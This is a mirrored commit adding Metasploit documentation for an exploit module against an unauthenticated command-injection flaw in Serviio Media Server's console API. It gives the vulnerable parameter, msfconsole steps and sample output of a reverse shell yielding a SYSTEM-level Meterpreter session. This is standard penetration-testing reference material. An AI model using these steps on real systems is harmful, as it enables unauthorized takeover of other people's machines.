infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Add documentation

bug/bundler_fix
Brendan Coles 2017-05-06 12:58:53 +00:00
parent 0eacf64324
commit 283a40a279
1 changed files with 71 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

71
documentation/modules/exploit/windows/http/serviio_checkstreamurl_cmd_exec.md Normal file
View File

@ -0,0 +1,71 @@
## Description
This module exploits an unauthenticated remote command execution vulnerability in the console component of [Serviio Media Server](http://serviio.org/) versions 1.4 to 1.8 on Windows operating systems.
The console service (on port 23423 by default) exposes a REST API which which does not require authentication.
The 'action' API endpoint does not sufficiently sanitize user-supplied data in the 'VIDEO' parameter of the 'checkStreamUrl' method. This parameter is used in a call to cmd.exe resulting in execution of arbitrary commands.
## Vulnerable Application
Serviio is a free media server. It allows you to stream your media files (music, video or images) to renderer devices (e.g. a TV set, Bluray player, games console or mobile phone) on your connected home network.
Serviio is based on Java technology and therefore runs on most platforms, including Windows, Mac and Linux (incl. embedded systems, e.g. NAS).
This module has been tested successfully on Serviio Media Server versions 1.4.0, 1.5.0, 1.6.0 and 1.8.0 on Windows 7.
Installers:
* [serviio-1.8-win-setup.exe](http://download.serviio.org/releases/serviio-1.8-win-setup.exe)
* [serviio-1.7-win-setup.exe](http://download.serviio.org/releases/serviio-1.7-win-setup.exe)
* [serviio-1.6-win-setup.exe](http://download.serviio.org/releases/serviio-1.6-win-setup.exe)
* [serviio-1.5-win-setup.exe](http://download.serviio.org/releases/serviio-1.5-win-setup.exe)
* [serviio-1.4-win-setup.exe](http://download.serviio.org/releases/serviio-1.4-win-setup.exe)
## Verification Steps
1. Start `msfconsole`
2. Do: `use exploit/windows/http/serviio_checkstreamurl_cmd_exec`
3. Do: `set rhost [IP]`
4. Do: `run`
5. You should get a session
## Sample Output
```
msf > use exploit/windows/http/serviio_checkstreamurl_cmd_exec
msf exploit(serviio_checkstreamurl_cmd_exec) > set rhost 172.16.191.166
rhost => 172.16.191.166
msf exploit(serviio_checkstreamurl_cmd_exec) > check
[*] 172.16.191.166:23423 The target appears to be vulnerable.
msf exploit(serviio_checkstreamurl_cmd_exec) > set verbose true
verbose => true
msf exploit(serviio_checkstreamurl_cmd_exec) > check
[*] 172.16.191.166:23423 Serviio Media Server version 1.8
[*] 172.16.191.166:23423 The target appears to be vulnerable.
msf exploit(serviio_checkstreamurl_cmd_exec) > run
[*] Started reverse TCP handler on 172.16.191.181:4444
[*] Serviio Media Server version 1.8
[*] Command Stager progress - 7.95% done (7999/100636 bytes)
[*] Command Stager progress - 15.90% done (15998/100636 bytes)
[*] Command Stager progress - 23.85% done (23997/100636 bytes)
[*] Command Stager progress - 31.79% done (31996/100636 bytes)
[*] Command Stager progress - 39.74% done (39995/100636 bytes)
[*] Command Stager progress - 47.69% done (47994/100636 bytes)
[*] Command Stager progress - 55.64% done (55993/100636 bytes)
[*] Command Stager progress - 63.59% done (63992/100636 bytes)
[*] Command Stager progress - 71.54% done (71991/100636 bytes)
[*] Command Stager progress - 79.48% done (79990/100636 bytes)
[*] Command Stager progress - 87.43% done (87989/100636 bytes)
[*] Command Stager progress - 95.38% done (95988/100636 bytes)
[*] Sending stage (957487 bytes) to 172.16.191.166
[*] Command Stager progress - 100.00% done (100636/100636 bytes)
[*] Meterpreter session 1 opened (172.16.191.181:4444 -> 172.16.191.166:58474) at 2017-05-05 02:49:39 -0400
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > pwd
C:\Program Files\Serviio\bin
```